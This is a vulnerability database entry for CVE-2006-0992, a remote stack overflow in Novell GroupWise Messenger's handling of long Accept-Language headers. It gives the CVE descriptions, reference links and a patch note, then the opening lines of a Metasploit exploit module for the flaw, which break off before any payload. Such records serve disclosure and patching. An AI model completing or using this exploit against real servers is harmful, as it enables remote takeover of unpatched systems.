CVE-2006-0992
CVSS 10.0
Published: 2006-04-14 06:02:00
Last revised: 2017-07-19 21:30:13

[Original] Stack-based buffer overflow in Novell GroupWise Messenger before 2.0 Public Beta 2 allows remote attackers to execute arbitrary code via a long Accept-Language value without a comma or semicolon. NOTE: due to a typo, the original ZDI advisory accidentally referenced CVE-2006-0092. This is the correct identifier.


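[CNNVD] Novell GroupWise Messenger Accept-Language field remote buffer overflow vulnerability (CNNVD-200604-223)

        Novell GroupWise Messenger is an instant messaging tool based on the GroupWise platform.
        Novell GroupWise Agent has a buffer overflow vulnerability when processing malformed HTTP field data; a remote attacker may exploit this vulnerability to take control of the user's system.
        The GroupWise Messenger web server listens on port TCP/8300. A buffer overflow occurs when it processes overly long Accept-Language field data in the HTTP header, and a remote attacker can exploit this vulnerability to execute arbitrary commands on the system.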

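- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) is currently unavailable

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0992
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-223
(Official data source) CNNVD

- Other links and resources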

http://cirt.dk/advisories/cirt-42-advisory.txt
(UNKNOWN)  MISC  http://cirt.dk/advisories/cirt-42-advisory.txt
http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
(UNKNOWN)  MISC  http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
http://securitytracker.com/id?1015911
(UNKNOWN)  SECTRACK  1015911
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
http://www.milw0rm.com/exploits/1679
(UNKNOWN)  MILW0RM  1679
http://www.securityfocus.com/archive/1/archive/1/430911/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060413 ZDI-06-008: Novell GroupWise Messenger Accept-Language Buffer Overflow
http://www.securityfocus.com/bid/17503
(PATCH)  BID  17503
http://www.vupen.com/english/advisories/2006/1355
(UNKNOWN)  VUPEN  ADV-2006-1355
http://www.zerodayinitiative.com/advisories/ZDI-06-008.html
(VENDOR_ADVISORY)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-06-008.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/25828
(UNKNOWN)  XF  groupwise-accept-language-bo(25828)

- Vulnerability information

Novell GroupWise Messenger Accept-Language field remote buffer overflow vulnerability
Critical  Buffer overflow
2006-04-14 00:00:00 2006-04-15 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. Patch download link:
        http://support.novell.com/security-alerts

- Vulnerability information (1679)

Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit (EDBID:1679)
novell remote
2006-04-15 Verified
8300 H D Moore
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::novell_messenger_acceptlang;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'    => 'Novell Messenger Server 2.0 Accept-Language Overflow',
	'Version' => '$Revision: 1.5 $',
	'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winnt', 'winxp', 'win2k', 'win2003' ],
	'Priv'  => 1,

	'AutoOpts'  =>  { 'EXITFUNC' => 'process' },

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 8300 ],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],